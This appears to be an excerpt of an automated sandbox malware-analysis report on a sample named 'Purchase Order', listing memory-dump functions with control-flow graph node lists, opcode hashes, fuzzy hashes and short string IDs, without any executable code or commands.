                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                            • API String ID: 0-524576615
                                                                                                            • Opcode ID: 0797c80f8f631ace0eec84ed8769a53adce13f9166ebe9cd1689a403cb64e162
                                                                                                            • Instruction ID: aa77449fdaecc2de0d37ddbe10092bd32cce8816ac7b00f6b26e17ecc14724c7
                                                                                                            • Opcode Fuzzy Hash: 0797c80f8f631ace0eec84ed8769a53adce13f9166ebe9cd1689a403cb64e162
                                                                                                            • Instruction Fuzzy Hash: 9081D674E01618CFDB14DFA9D984A9DBBF2BF88300F14C069E859AB365DB309981DF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166C4D0 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 441 166c4d0-166c500 442 166c507-166c5e4 call 1663960 call 1663480 441->442 443 166c502 441->443 453 166c5e6 442->453 454 166c5eb-166c61c call 1664e20 442->454 443->442 453->454 457 166c623-166c627 454->457 458 166c61e 454->458 459 166c62c-166c633 457->459 460 166c629-166c62a 457->460 458->457 462 166c635 459->462 463 166c63a-166c648 459->463 461 166c64b-166c68f 460->461 467 166c6f5-166c70c 461->467 462->463 463->461 469 166c691-166c6a7 467->469 470 166c70e-166c733 467->470 474 166c6d1 469->474 475 166c6a9-166c6b5 469->475 476 166c735-166c738 470->476 477 166c74b-166c7b8 470->477 480 166c6d7-166c6f4 474->480 478 166c6b7-166c6bd 475->478 479 166c6bf-166c6c5 475->479 481 166c73d-166c74a 476->481 477->481 487 166c7ba-166c7e0 477->487 482 166c6cf 478->482 479->482 480->467 481->477 482->480 489 166c7e7-166c8c4 call 1663960 call 1663480 487->489 490 166c7e2 487->490 500 166c8c6 489->500 501 166c8cb-166c8ec call 1664e20 489->501 490->489 500->501 503 166c8f1-166c8fc 501->503 504 166c903-166c907 503->504 505 166c8fe 503->505 506 166c90c-166c913 504->506 507 166c909-166c90a 504->507 505->504 509 166c915 506->509 510 166c91a-166c928 506->510 508 166c92b-166c96f 507->508 514 166c9d5-166c9ec 508->514 509->510 510->508 516 166c971-166c987 514->516 517 166c9ee-166ca13 514->517 521 166c9b1 516->521 522 166c989-166c995 516->522 524 166ca15-166ca2a 517->524 525 166ca2b 517->525 523 166c9b7-166c9d4 521->523 526 166c997-166c99d 522->526 527 166c99f-166c9a5 522->527 523->514 524->525 528 166c9af 526->528 527->528 528->523
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                            • API String ID: 0-524576615
                                                                                                            • Opcode ID: d7033647b4253dc9679286b0c12fdedacf9062a2b5aa911e8e6fae35641200f2
                                                                                                            • Instruction ID: 25ff93def91bbf0324169abd54b422cbb0bf5da7c034ee839e3b90baa393cee8
                                                                                                            • Opcode Fuzzy Hash: d7033647b4253dc9679286b0c12fdedacf9062a2b5aa911e8e6fae35641200f2
                                                                                                            • Instruction Fuzzy Hash: E181B274E00618CFDB14DFAAD994A9DBBF2BF89300F14D069E449AB365DB34A981CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01664B31 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 532 1664b31-1664b60 533 1664b67-1664c44 call 1663960 call 1663480 532->533 534 1664b62 532->534 544 1664c46 533->544 545 1664c4b-1664c69 533->545 534->533 544->545 575 1664c6c call 1664e20 545->575 576 1664c6c call 1664e11 545->576 546 1664c72-1664c7d 547 1664c84-1664c88 546->547 548 1664c7f 546->548 549 1664c8d-1664c94 547->549 550 1664c8a-1664c8b 547->550 548->547 552 1664c96 549->552 553 1664c9b-1664ca9 549->553 551 1664cac-1664cf0 550->551 557 1664d56-1664d6d 551->557 552->553 553->551 559 1664cf2-1664d08 557->559 560 1664d6f-1664d94 557->560 564 1664d32 559->564 565 1664d0a-1664d16 559->565 566 1664d96-1664dab 560->566 567 1664dac 560->567 570 1664d38-1664d55 564->570 568 1664d20-1664d26 565->568 569 1664d18-1664d1e 565->569 566->567 571 1664d30 568->571 569->571 570->557 571->570 575->546 576->546
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                            • API String ID: 0-524576615
                                                                                                            • Opcode ID: c33c8861f144e6cb90f86b01af1d9b2e78d7efccf103108a3da0112c5773214b
                                                                                                            • Instruction ID: 4d9ed2fca349f534002cdaf5c9409adea366b547c39edded63bd29b861067ec2
                                                                                                            • Opcode Fuzzy Hash: c33c8861f144e6cb90f86b01af1d9b2e78d7efccf103108a3da0112c5773214b
                                                                                                            • Instruction Fuzzy Hash: EF81B574E01218DFDB18CFA9D984A9DBBF2BF89300F14C069E819AB365DB349981CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 016668E0 Relevance: 5.3, Strings: 4, Instructions: 328COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 577 16668e0-1666903 578 1666905-166690b 577->578 579 166690e-166692e 577->579 578->579 582 1666935-166693c 579->582 583 1666930 579->583 585 166693e-1666949 582->585 584 1666cc4-1666ccd 583->584 586 1666cd5-1666ce1 585->586 587 166694f-1666962 585->587 590 1666964-1666972 587->590 591 1666978-1666993 587->591 590->591 594 1666c4c-1666c53 590->594 595 16669b7-16669ba 591->595 596 1666995-166699b 591->596 594->584 599 1666c55-1666c57 594->599 600 1666b14-1666b1a 595->600 601 16669c0-16669c3 595->601 597 16669a4-16669a7 596->597 598 166699d 596->598 603 16669da-16669e0 597->603 604 16669a9-16669ac 597->604 598->597 598->600 602 1666c06-1666c09 598->602 598->603 605 1666c66-1666c6c 599->605 606 1666c59-1666c5e 599->606 600->602 607 1666b20-1666b25 600->607 601->600 608 16669c9-16669cf 601->608 613 1666cd0 602->613 614 1666c0f-1666c15 602->614 615 16669e6-16669e8 603->615 616 16669e2-16669e4 603->616 609 1666a46-1666a4c 604->609 610 16669b2 604->610 605->586 611 1666c6e-1666c73 605->611 606->605 607->602 608->600 612 16669d5 608->612 609->602 619 1666a52-1666a58 609->619 610->602 617 1666c75-1666c7a 611->617 618 1666cb8-1666cbb 611->618 612->602 613->586 620 1666c17-1666c1f 614->620 621 1666c3a-1666c3e 614->621 622 16669f2-16669fb 615->622 616->622 617->613 627 1666c7c 617->627 618->613 626 1666cbd-1666cc2 618->626 628 1666a5e-1666a60 619->628 629 1666a5a-1666a5c 619->629 620->586 630 1666c25-1666c34 620->630 621->594 625 1666c40-1666c46 621->625 623 1666a0e-1666a36 622->623 624 16669fd-1666a08 622->624 650 1666a3c-1666a41 623->650 651 1666b2a-1666b60 623->651 624->602 624->623 625->585 625->594 626->584 626->599 631 1666c83-1666c88 627->631 632 1666a6a-1666a81 628->632 629->632 630->591 630->621 636 1666caa-1666cac 631->636 637 1666c8a-1666c8c 631->637 643 1666a83-1666a9c 632->643 644 1666aac-1666ad3 632->644 636->613 639 1666cae-1666cb1 636->639 640 1666c8e-1666c93 637->640 641 1666c9b-1666ca1 637->641 639->618 640->641 641->586 642 1666ca3-1666ca8 641->642 642->636 646 1666c7e-1666c81 642->646 643->651 654 1666aa2-1666aa7 643->654 644->613 656 1666ad9-1666adc 644->656 646->613 646->631 650->651 658 1666b62-1666b66 651->658 659 1666b6d-1666b75 651->659 654->651 656->613 657 1666ae2-1666b0b 656->657 657->651 674 1666b0d-1666b12 657->674 661 1666b85-1666b89 658->661 662 1666b68-1666b6b 658->662 659->613 660 1666b7b-1666b80 659->660 660->602 664 1666b8b-1666b91 661->664 665 1666ba8-1666bac 661->665 662->659 662->661 664->665 666 1666b93-1666b9b 664->666 667 1666bb6-1666bd5 call 1666eb8 665->667 668 1666bae-1666bb4 665->668 666->613 670 1666ba1-1666ba6 666->670 671 1666bdb-1666bdf 667->671 668->667 668->671 670->602 671->602 672 1666be1-1666bfd 671->672 672->602 674->651
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (ofq$(ofq$,jq$,jq
                                                                                                            • API String ID: 0-1018418033
                                                                                                            • Opcode ID: 2b4b311051d42e879b344ecac9030d5e7dfbb679c9221ef3d557787149a3fbde
                                                                                                            • Instruction ID: b7a71cd6c320095141d7ae146694dfd9382a1719ae5be57feb205cedc8784215
                                                                                                            • Opcode Fuzzy Hash: 2b4b311051d42e879b344ecac9030d5e7dfbb679c9221ef3d557787149a3fbde
                                                                                                            • Instruction Fuzzy Hash: D4D12870E00519DFDB14CFA9E984AADBBFAFF88304F158169E905AB3A5D730E851CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166BC08 Relevance: 3.9, Strings: 3, Instructions: 170COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1223 166bc08-166bc31 1228 166bc33-166bc60 1223->1228 1229 166bca1-166bd44 call 1663960 call 1663480 1223->1229 1230 166bc67-166bca0 1228->1230 1231 166bc62 1228->1231 1241 166bd46 1229->1241 1242 166bd4b-166bd6c call 1664e20 1229->1242 1230->1229 1231->1230 1241->1242 1244 166bd71-166bd7c 1242->1244 1245 166bd83-166be93 1244->1245 1246 166bd7e 1244->1246 1256 166be95-166beaa 1245->1256 1257 166beab 1245->1257 1246->1245 1256->1257
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$PHfq$PHfq
                                                                                                            • API String ID: 0-1758807719
                                                                                                            • Opcode ID: 26fbeac6c2b11977ee19ac3dd7c72740eb2900403b43dbb2dfc114d90fc4b035
                                                                                                            • Instruction ID: a044103b3703e606324dfbb3aa3c6551efe3a009c4a235046717969e63b4b155
                                                                                                            • Opcode Fuzzy Hash: 26fbeac6c2b11977ee19ac3dd7c72740eb2900403b43dbb2dfc114d90fc4b035
                                                                                                            • Instruction Fuzzy Hash: B361E6B1E00218CFDB18DFAAD984A9DBBF6FF88310F14916AD409AB365DB309941CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166B552 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1260 166b552-166b559 1261 166b55b-166b580 1260->1261 1262 166b5c9-166b5e3 1260->1262 1265 166b587-166b5e6 call 1663960 1261->1265 1266 166b582 1261->1266 1268 166b5eb-166b664 call 1663480 1262->1268 1269 166b5e6 call 1663960 1262->1269 1265->1268 1266->1265 1278 166b666 1268->1278 1279 166b66b-166b68c call 1664e20 1268->1279 1269->1268 1278->1279 1281 166b691-166b69c 1279->1281 1282 166b6a3-166b6a7 1281->1282 1283 166b69e 1281->1283 1284 166b6ac-166b6b3 1282->1284 1285 166b6a9-166b6aa 1282->1285 1283->1282 1287 166b6b5 1284->1287 1288 166b6ba-166b6c8 1284->1288 1286 166b6cb-166b70f 1285->1286 1292 166b775-166b78c 1286->1292 1287->1288 1288->1286 1294 166b711-166b727 1292->1294 1295 166b78e-166b7b3 1292->1295 1299 166b751 1294->1299 1300 166b729-166b735 1294->1300 1301 166b7b5-166b7ca 1295->1301 1302 166b7cb 1295->1302 1305 166b757-166b774 1299->1305 1303 166b737-166b73d 1300->1303 1304 166b73f-166b745 1300->1304 1301->1302 1308 166b7cc 1302->1308 1306 166b74f 1303->1306 1304->1306 1305->1292 1306->1305 1308->1308
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp$PHfq$PHfq
                                                                                                            • API String ID: 0-1758807719
                                                                                                            • Opcode ID: cec0cfb88f92435300e621a26f3b7e1ee02fef0a61024d09c772b9fd8d900052
                                                                                                            • Instruction ID: 494c51138680c494900f2ad85099cd69e8e417b3231a315a7382b9e60d815d2f
                                                                                                            • Opcode Fuzzy Hash: cec0cfb88f92435300e621a26f3b7e1ee02fef0a61024d09c772b9fd8d900052
                                                                                                            • Instruction Fuzzy Hash: 9261C774E00218DFDB18DFAAD984A9EBBF2FF88300F148069E915AB365DB349941CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 016698B8 Relevance: 3.4, Strings: 2, Instructions: 854COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (ofq$4'fq
                                                                                                            • API String ID: 0-2623281765
                                                                                                            • Opcode ID: c2e1483c9e333192b0a03a63b262f3f3c0c92d6bdc2f7965f7f8f59c06e8ec22
                                                                                                            • Instruction ID: 4dc04bc22b6ee7e64f950394556e3877bfa09b6af713c72a10a23a5d58ea2c13
                                                                                                            • Opcode Fuzzy Hash: c2e1483c9e333192b0a03a63b262f3f3c0c92d6bdc2f7965f7f8f59c06e8ec22
                                                                                                            • Instruction Fuzzy Hash: 3872AE30A00219DFCB15CFA8C984AAEBBFAFF89304F198559E905AB365D731ED51CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01666168 Relevance: 3.0, Strings: 2, Instructions: 513COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2180 1666168-16661ae 2183 16661b4-16661c2 2180->2183 2184 1666779-16667d4 call 16668e0 2180->2184 2187 16661c4-16661d5 2183->2187 2188 16661f0-1666201 2183->2188 2195 16667d6-16667da 2184->2195 2196 1666824-1666828 2184->2196 2187->2188 2197 16661d7-16661e3 2187->2197 2189 1666272-1666286 2188->2189 2190 1666203-1666207 2188->2190 2324 1666289 call 1666790 2189->2324 2325 1666289 call 1666168 2189->2325 2193 1666222-166622b 2190->2193 2194 1666209-1666215 2190->2194 2203 1666534 2193->2203 2204 1666231-1666234 2193->2204 2199 16665a3-16665ee 2194->2199 2200 166621b-166621d 2194->2200 2205 16667dc-16667e1 2195->2205 2206 16667e9-16667f0 2195->2206 2201 166683f-1666853 2196->2201 2202 166682a-1666839 2196->2202 2209 1666539-166659c 2197->2209 2210 16661e9-16661eb 2197->2210 2198 166628f-1666295 2211 1666297-1666299 2198->2211 2212 166629e-16662a5 2198->2212 2279 16665f5-1666674 2199->2279 2213 166652a-1666531 2200->2213 2217 166685b-1666862 2201->2217 2327 1666855 call 16698b1 2201->2327 2328 1666855 call 16698b8 2201->2328 2214 1666865-166686f 2202->2214 2215 166683b-166683d 2202->2215 2203->2209 2204->2203 2216 166623a-1666259 2204->2216 2205->2206 2207 16668c6-16668db 2206->2207 2208 16667f6-16667fd 2206->2208 2208->2196 2218 16667ff-1666803 2208->2218 2209->2199 2210->2213 2211->2213 2222 1666393-16663a4 2212->2222 2223 16662ab-16662c2 2212->2223 2220 1666871-1666877 2214->2220 2221 1666879-166687d 2214->2221 2215->2217 2216->2203 2241 166625f-1666265 2216->2241 2225 1666805-166680a 2218->2225 2226 1666812-1666819 2218->2226 2227 1666885-16668bf 2220->2227 2221->2227 2228 166687f 2221->2228 2236 16663a6-16663b3 2222->2236 2237 16663ce-16663d4 2222->2237 2223->2222 2239 16662c8-16662d4 2223->2239 2225->2226 2226->2207 2231 166681f-1666822 2226->2231 2227->2207 2228->2227 2231->2217 2244 16663ef-16663f5 2236->2244 2256 16663b5-16663c1 2236->2256 2243 16663d6-16663e2 2237->2243 2237->2244 2245 166638c-166638e 2239->2245 2246 16662da-1666346 2239->2246 2241->2184 2248 166626b-166626f 2241->2248 2251 166668b-16666ee 2243->2251 2252 16663e8-16663ea 2243->2252 2253 1666527 2244->2253 2254 16663fb-1666418 2244->2254 2245->2213 2281 1666374-1666389 2246->2281 2282 1666348-1666372 2246->2282 2248->2189 2304 16666f5-1666774 2251->2304 2252->2213 2253->2213 2254->2203 2271 166641e-1666421 2254->2271 2260 16663c7-16663c9 2256->2260 2261 1666679-1666684 2256->2261 2260->2213 2261->2251 2271->2184 2274 1666427-166644d 2271->2274 2274->2253 2285 1666453-166645f 2274->2285 2281->2245 2282->2281 2288 1666465-16664dd 2285->2288 2289 1666523-1666525 2285->2289 2307 16664df-1666509 2288->2307 2308 166650b-1666520 2288->2308 2289->2213 2307->2308 2308->2289 2324->2198 2325->2198 2327->2217 2328->2217
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (ofq$Hjq
                                                                                                            • API String ID: 0-2051923243
                                                                                                            • Opcode ID: 521053ff673e1cbcf98c89d781e71afb70b2d32bde9ae174e8d99f9ec48c5c60
                                                                                                            • Instruction ID: 19392a52bff1010a1fab774e672687892acc3fa5451f1c71b70398c877fb64ac
                                                                                                            • Opcode Fuzzy Hash: 521053ff673e1cbcf98c89d781e71afb70b2d32bde9ae174e8d99f9ec48c5c60
                                                                                                            • Instruction Fuzzy Hash: C4128E70A002198FDB14DF69D954AAEBBFAFF88300F14856DE506DB395EB349D41CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E98C51 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PHfq$PHfq
                                                                                                            • API String ID: 0-3546021038
                                                                                                            • Opcode ID: 04e6888a0da5fb14fc60ffefd3ca053dce6bfd0b9d93d142d068dca8da93479b
                                                                                                            • Instruction ID: 0358737800e9d74e075e088314f902ac65a041e4e04575842fb6fa96eaf47b27
                                                                                                            • Opcode Fuzzy Hash: 04e6888a0da5fb14fc60ffefd3ca053dce6bfd0b9d93d142d068dca8da93479b
                                                                                                            • Instruction Fuzzy Hash: 5381D070E01218CFDB58CFA9D9947AEBBF2BF89304F20956AD419AB3A4DB305945CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB7BA8 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 34570860c309f25d45babaee03c7094fd2f817890d8ae554712192e9472eab2e
                                                                                                            • Instruction ID: 5cdcc9ce5b55935263cfa9d9b3cfbe794b83d46d5f0b7385050924f199b4096e
                                                                                                            • Opcode Fuzzy Hash: 34570860c309f25d45babaee03c7094fd2f817890d8ae554712192e9472eab2e
                                                                                                            • Instruction Fuzzy Hash: DDF1D574E01218DFDB14DFA9C984B9DBBB2FF88300F5481AAD809AB355DB749986CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E911A0 Relevance: .7, Instructions: 745COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e75ea1049fb7cc1bcb026bc6a31326999691591721ae2d600aca5570001c68ca
                                                                                                            • Instruction ID: bde06b4dc2b564a975e682d33a539134da44b7b229c0e21e4d77e31e90d69420
                                                                                                            • Opcode Fuzzy Hash: e75ea1049fb7cc1bcb026bc6a31326999691591721ae2d600aca5570001c68ca
                                                                                                            • Instruction Fuzzy Hash: AC827D74E012298FDB64DF69D998BDDBBB2BF49300F1081EA980DA7264DB345E81CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166EDF0 Relevance: .7, Instructions: 716COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a96448b8febc8806bf0b713c01e98b82fa09f09617835130e9b894573677490f
                                                                                                            • Instruction ID: 30ffe44fe0408c0c40e91cb2e135ba065c4c97eaa1ea0d2f02072299f5ad1da2
                                                                                                            • Opcode Fuzzy Hash: a96448b8febc8806bf0b713c01e98b82fa09f09617835130e9b894573677490f
                                                                                                            • Instruction Fuzzy Hash: AE72DD74E01229CFDB64CF69D994BD9BBB6BB49300F1491EAD408A7265DB34AE81CF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E98608 Relevance: .3, Instructions: 296COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e79a65a3dfce1ffb9d6e166df80c34eb51be9ce21b9b36c324e28369f6d7c0fc
                                                                                                            • Instruction ID: 82ada24a74018ce035599109e43904fbfbb28e716cd7450ee261f2afaf1aa95b
                                                                                                            • Opcode Fuzzy Hash: e79a65a3dfce1ffb9d6e166df80c34eb51be9ce21b9b36c324e28369f6d7c0fc
                                                                                                            • Instruction Fuzzy Hash: 35E1B274E01218CFEB64DFA9D984B9DBBB2BF89304F2081AAD409A7394DB755D85CF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166FA10 Relevance: .3, Instructions: 272COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8192e38fa13cfccd02f404ab335cdf4867861e031f51678fe7a75f63e3edf9c3
                                                                                                            • Instruction ID: 635564727981ed6e5704e8c2e333c74caf524e56c9c91cbfe23c4cf6ca8ba097
                                                                                                            • Opcode Fuzzy Hash: 8192e38fa13cfccd02f404ab335cdf4867861e031f51678fe7a75f63e3edf9c3
                                                                                                            • Instruction Fuzzy Hash: 7FD18F74E01218CFDB14DFA9D994B9DBBB2BF89300F1081A9D809AB355DB355E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9B6E8 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4ebe12dde0e601a6f7938f904f032b574e7b6d1e23ecb99f5a34433af2b8d10
                                                                                                            • Instruction ID: bb1239f3340bc2de76e7796024228e5d4bedd82667aafa2cd813fc485b938d13
                                                                                                            • Opcode Fuzzy Hash: b4ebe12dde0e601a6f7938f904f032b574e7b6d1e23ecb99f5a34433af2b8d10
                                                                                                            • Instruction Fuzzy Hash: 0EA1A474E012188FEB68CF6AD944B9EBBF2AF89300F14D0AAD409A7254DB705A85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9D670 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 703b1fb42aaccca03de6f1f62205ee1182d551f70d164a02fc99f18163160e37
                                                                                                            • Instruction ID: afa72019ef5ff5b3366c8caac673ea41c9410cf3ecdbfe22945f70a7f79d2bc3
                                                                                                            • Opcode Fuzzy Hash: 703b1fb42aaccca03de6f1f62205ee1182d551f70d164a02fc99f18163160e37
                                                                                                            • Instruction Fuzzy Hash: 6CA1B374E016288FEB68CF6AD944B9DBBF2BF89300F14D0AAD40DA7255DB705A85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9C388 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06977fc67efa1fc84814134b790466aab37487cc8a703a4ab1bcd1517346af69
                                                                                                            • Instruction ID: e44cd404d2d67093d26aaf04c103ef9c7b62affc95faf134f4c729b90239d447
                                                                                                            • Opcode Fuzzy Hash: 06977fc67efa1fc84814134b790466aab37487cc8a703a4ab1bcd1517346af69
                                                                                                            • Instruction Fuzzy Hash: ABA1A471E01218CFEB64DF6AD944B9DBBF2AF89300F14D0AAD40DA7255DB305A85CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

